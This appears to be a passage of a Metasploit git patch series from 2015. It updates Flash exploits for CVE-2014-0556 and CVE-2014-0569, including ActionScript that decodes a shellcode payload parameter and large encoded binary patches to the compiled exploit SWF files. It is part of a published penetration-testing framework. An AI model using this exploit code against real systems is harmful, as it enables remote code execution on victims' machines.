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

diff --git a/external/source/exploits/CVE-2014-0556/Main.as b/external/source/exploits/CVE-2014-0556/Main.as
index 99364ccd47..98d79ea459 100755
--- a/external/source/exploits/CVE-2014-0556/Main.as
+++ b/external/source/exploits/CVE-2014-0556/Main.as
@@ -27,8 +27,12 @@ package
 		public function Main() 
 		{
 			var b64:Base64Decoder = new Base64Decoder()
-			b64.decode(LoaderInfo(this.root.loaderInfo).parameters.sh)
-			var payload:String = b64.toByteArray().toString()
+
+            var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
+            var pattern:RegExp = / /g;
+            b64_payload = b64_payload.replace(pattern, "+")
+            b64.decode(b64_payload)            
+            var payload:String = b64.toByteArray().toString()
 			
 			for (i = 0; i < bv.length; i++) {
 				bv[i] = new ByteArray()

From e0a1fa4ef6aa69b2d822c74970de35b371b4c01b Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Tue, 26 May 2015 15:38:56 -0500
Subject: [PATCH 0198/1013] Fix indentation

---
 data/exploits/CVE-2014-0556/msf.swf            | Bin
 external/source/exploits/CVE-2014-0556/Main.as |  11 +++++------
 2 files changed, 5 insertions(+), 6 deletions(-)
 mode change 100644 => 100755 data/exploits/CVE-2014-0556/msf.swf

diff --git a/data/exploits/CVE-2014-0556/msf.swf b/data/exploits/CVE-2014-0556/msf.swf
old mode 100644
new mode 100755
diff --git a/external/source/exploits/CVE-2014-0556/Main.as b/external/source/exploits/CVE-2014-0556/Main.as
index 98d79ea459..da6482075c 100755
--- a/external/source/exploits/CVE-2014-0556/Main.as
+++ b/external/source/exploits/CVE-2014-0556/Main.as
@@ -27,12 +27,11 @@ package
 		public function Main() 
 		{
 			var b64:Base64Decoder = new Base64Decoder()
-
-            var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
-            var pattern:RegExp = / /g;
-            b64_payload = b64_payload.replace(pattern, "+")
-            b64.decode(b64_payload)            
-            var payload:String = b64.toByteArray().toString()
+			var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
+			var pattern:RegExp = / /g;
+			b64_payload = b64_payload.replace(pattern, "+")
+			b64.decode(b64_payload)
+			var payload:String = b64.toByteArray().toString()
 			
 			for (i = 0; i < bv.length; i++) {
 				bv[i] = new ByteArray()

From d78d04e0701b1ca399213b000e3a3295f2ae7c42 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Tue, 26 May 2015 15:49:22 -0500
Subject: [PATCH 0199/1013] Fix CVE-2014-0569

---
 data/exploits/CVE-2014-0569/msf.swf           | Bin 17933 -> 18021 bytes
 .../source/exploits/CVE-2014-0569/Main.as     |  11 +++++++----
 2 files changed, 7 insertions(+), 4 deletions(-)

diff --git a/data/exploits/CVE-2014-0569/msf.swf b/data/exploits/CVE-2014-0569/msf.swf
index 90737fca369ad0f015ceb51d7c44efa5fc4f30a1..a124c560f09b1a9ff03b1080ce13873cecc9d9d6 100755
GIT binary patch
delta 17880
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
